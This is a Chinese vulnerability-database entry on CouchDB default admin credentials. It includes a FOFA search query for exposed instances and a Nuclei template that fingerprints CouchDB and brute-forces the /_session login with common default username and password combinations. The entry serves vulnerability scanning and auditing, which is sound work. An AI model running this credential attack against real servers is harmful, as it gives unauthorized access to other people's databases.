漏洞信息
漏洞名称: CouchDB 默认登录漏洞
漏洞类型: 弱口令
漏洞等级: 高危
漏洞描述: CouchDB是一个开源的NoSQL数据库,由Apache软件基金会维护,广泛用于Web应用程序和分布式系统中,因其易于使用和灵活性而受到开发者的青睐。该漏洞涉及CouchDB的默认登录凭证问题,攻击者可以利用这些弱口令轻易获取管理员权限。漏洞的技术根源在于CouchDB安装后未强制修改默认的管理员用户名和密码,导致攻击者可以通过简单的暴力破解或尝试常见默认凭证组合来获得访问权限。这种配置问题属于常见的安全疏忽,但影响深远。一旦攻击者成功登录,他们可以执行任意操作,包括读取、修改或删除数据库中的敏感信息,甚至可能进一步利用系统权限进行更广泛的攻击。由于此漏洞不需要任何前置条件或认证即可利用,且存在公开的利用脚本,因此其风险等级被评定为高危。企业应立即检查并修改所有CouchDB实例的默认凭证,以防止潜在的安全威胁。
产品厂商: apache
产品名称: couchdb
影响版本: *
搜索语法: app=”APACHE-CouchDB”
来源: https://github.com/projectdiscovery/nuclei-templates/blob/d694ffeb6baa526904249ded765790e5726c0b03/http%2Fdefault-logins%2Fcouchdb%2Fcouchdb-default-login.yaml
类型: projectdiscovery/nuclei-templates:github issues
POC详情
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83
| id: couchdb-default-login
info: name: CouchDB - Default Login author: thefoggiest severity: high description: | CouchDB weak admin credentials were discovered. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 cpe: cpe:2.3:a:apache:couchdb:*:*:*:*:*:*:*:* metadata: verified: true max-request: 17 fofa-query: app="APACHE-CouchDB" product: couchdb vendor: apache tags: default-login,couchdb,misconfig
flow: http(1) && http(2)
http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}}
matchers: - type: word words: - "CouchDB" - "couchdb" condition: or internal: true
- raw: - raw: - | POST /_session HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
name={{username}}&password={{password}}
payloads: username: - admin - administrator - couchdb - root password: - admin - test - password - couchdb attack: clusterbomb
stop-at-first-match: true matchers-condition: and matchers: - type: word part: body words: - '{"ok":true' - '"name":"' - '"roles":[' condition: and
- type: word part: header words: - application/json - AuthSession= condition: and
- type: status status: - 200
|